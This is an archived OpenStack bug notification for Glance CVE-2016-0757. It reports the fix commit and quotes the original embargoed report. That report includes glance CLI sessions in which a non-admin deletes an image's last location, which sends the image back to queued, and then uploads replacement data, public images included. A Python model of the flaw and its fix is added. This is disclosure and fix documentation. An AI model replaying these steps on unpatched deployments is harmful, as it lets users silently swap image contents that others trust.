yahoo-eng-team team mailing list archive
Message #45835
[Bug 1525915] Re: [OSSA 2016-006] Normal user can change image status if show_multiple_locations has been set to true (CVE-2016-0757)
Reviewed: https://review.openstack.org/275737
Committed: https://git.openstack.org/cgit/openstack/glance/commit/?id=6179e1e98808548f1c12a2b66784cac3c1e5ac0f
Submitter: Jenkins
Branch: master
commit 6179e1e98808548f1c12a2b66784cac3c1e5ac0f
Author: Erno Kuvaja <jokke@xxxxxx>
Date: Tue Jan 19 13:37:05 2016 +0000
Prevent user from removing the last location of the image
If the last location of the image is removed, the image transitions back to queued.
This allows the user to upload new data into the existing image record. By
preventing removal of the last location we prevent the image transition back to
queued.
This change also prevents doing the same operation via replacing the locations
with an empty list.
SecurityImpact
DocImpact
APIImpact
Change-Id: Ieb03aaba887492819f9c58aa67f7acfcea81720e
Closes-Bug: #1525915
** Changed in: glance
Status: New => Fix Released
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1525915
Title:
[OSSA 2016-006] Normal user can change image status if
show_multiple_locations has been set to true (CVE-2016-0757)
Status in Glance:
Fix Released
Status in Glance kilo series:
New
Status in Glance liberty series:
Fix Committed
Status in OpenStack Security Advisory:
Fix Committed
Bug description:
This issue is being treated as a potential security risk under
embargo. Please do not make any public mention of embargoed (private)
security vulnerabilities before their coordinated publication by the
OpenStack Vulnerability Management Team in the form of an official
OpenStack Security Advisory. This includes discussion of the bug or
associated fixes in public forums such as mailing lists, code review
systems and bug trackers. Please also avoid private disclosure to
other individuals not already approved for access to this information,
and provide this same reminder to those who are made aware of the
issue prior to publication. All discussion should remain confined to
this private bug report, and any proposed fixes should be added to the
bug as attachments.
--
A user (non-admin) can set an image back to the queued state by deleting
location(s) from the image when the "show_multiple_locations" config parameter
has been set to true.
This breaks the immutability promise Glance makes, in a similar way to that
described in OSSA 2015-019, as the image gets transitioned from active
to queued and new image data can be uploaded.
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [{"url": "file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a- |
| | 640dbe37b3bc", "metadata": {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | 25165824 |
| status | active |
| tags | [] |
| updated_at | 2015-12-14T09:58:54Z |
| virtual_size | None |
| visibility | private |
+------------------+----------------------------------------------------------------------------------+
ubuntu@devstack-02:~/devstack$ glance location-delete --url file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+--------------------------------------+
| Property | Value |
+------------------+--------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | None |
| status | queued |
| tags | [] |
| updated_at | 2015-12-14T13:43:23Z |
| virtual_size | None |
| visibility | private |
+------------------+--------------------------------------+
ubuntu@devstack-02:~/devstack$ glance image-upload --file files/images/cirros-0.3.4-x86_64-uec/cirros-0.3.4-x86_64-blank.img f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [{"url": "file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a- |
| | 640dbe37b3bc", "metadata": {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | 25165824 |
| status | active |
| tags | [] |
| updated_at | 2015-12-14T13:43:41Z |
| virtual_size | None |
| visibility | private |
+------------------+----------------------------------------------------------------------------------+
ubuntu@devstack-02:~/devstack$
This also works on public images.
ubuntu@devstack-02:~/devstack$ . ./openrc admin admin
ubuntu@devstack-02:~/devstack$ glance image-update --visibility=public f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [{"url": "file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a- |
| | 640dbe37b3bc", "metadata": {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | 25165824 |
| status | active |
| tags | [] |
| updated_at | 2015-12-14T13:45:11Z |
| virtual_size | None |
| visibility | public |
+------------------+----------------------------------------------------------------------------------+
ubuntu@devstack-02:~/devstack$ . ./openrc
ubuntu@devstack-02:~/devstack$ glance location-delete --url file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+--------------------------------------+
| Property | Value |
+------------------+--------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | None |
| status | queued |
| tags | [] |
| updated_at | 2015-12-14T13:45:28Z |
| virtual_size | None |
| visibility | public |
+------------------+--------------------------------------+
ubuntu@devstack-02:~/devstack$ glance image-upload --file files/images/cirros-0.3.4-x86_64-uec/cirros-0.3.4-x86_64-blank.img f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
ubuntu@devstack-02:~/devstack$ glance image-show f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | eb9139e4942121f22bbc2afc0400b2a4 |
| container_format | ami |
| created_at | 2015-12-14T09:58:54Z |
| disk_format | ami |
| id | f4bb4c9e-71ba-4a8c-b70a-640dbe37b3bc |
| locations | [{"url": "file:///opt/stack/data/glance/images/f4bb4c9e-71ba-4a8c-b70a- |
| | 640dbe37b3bc", "metadata": {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | cirros-test |
| owner | ab69274aa31a4fba8bf559af2b0b98bd |
| protected | False |
| size | 25165824 |
| status | active |
| tags | [] |
| updated_at | 2015-12-14T13:45:43Z |
| virtual_size | None |
| visibility | public |
+------------------+----------------------------------------------------------------------------------+
ubuntu@devstack-02:~/devstack$
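The active-to-queued transition the report reproduces, and the guard the fix commit describes (refuse to remove the last location, refuse an empty replacement list), as an added Python model; this is not Glance's own code, and the image path and bytes used in replay() are constructed.

```python
# Added model (not Glance's own code); locations are plain URL strings here.
import hashlib

class Forbidden(Exception):
    """A location change or upload that the fixed service must reject."""

class Image:
    def __init__(self, locations, data):
        self.locations = list(locations)
        self.checksum = hashlib.md5(data).hexdigest()
        self.status = "active"

    def _sync_status(self):
        # Pre-fix behaviour: with no locations left the record falls back to
        # 'queued', the only status in which image-upload is accepted.
        self.status = "active" if self.locations else "queued"

    def delete_location(self, url, fixed=True):
        # fixed=False models the code before commit 6179e1e9.
        if fixed and len(self.locations) == 1:
            raise Forbidden("cannot remove the last location of an image")
        self.locations.remove(url)
        self._sync_status()

    def replace_locations(self, new_locations, fixed=True):
        # The fix applies the same guard to a PATCH with an empty list.
        if fixed and not new_locations:
            raise Forbidden("cannot replace locations with an empty list")
        self.locations = list(new_locations)
        self._sync_status()

    def upload(self, data, url):
        # New image data is accepted only while the record is 'queued'.
        if self.status != "queued":
            raise Forbidden("image-upload requires status 'queued'")
        self.checksum = hashlib.md5(data).hexdigest()
        self.locations = [url]
        self._sync_status()

def replay(fixed):
    """Replay the report's delete-then-upload; return (status, data changed?)."""
    url = "file:///opt/stack/data/glance/images/f4bb4c9e"  # constructed path
    img = Image([url], b"original image bytes")
    before = img.checksum
    try:
        img.delete_location(url, fixed=fixed)
        img.upload(b"replacement bytes", url)
    except Forbidden:
        pass
    return img.status, img.checksum != before
```

With fixed=False the record ends up active again with a different checksum, exactly the sequence in the session above; with fixed=True the delete is refused, the image never enters queued, and the upload has nothing to latch onto.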
To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1525915/+subscriptions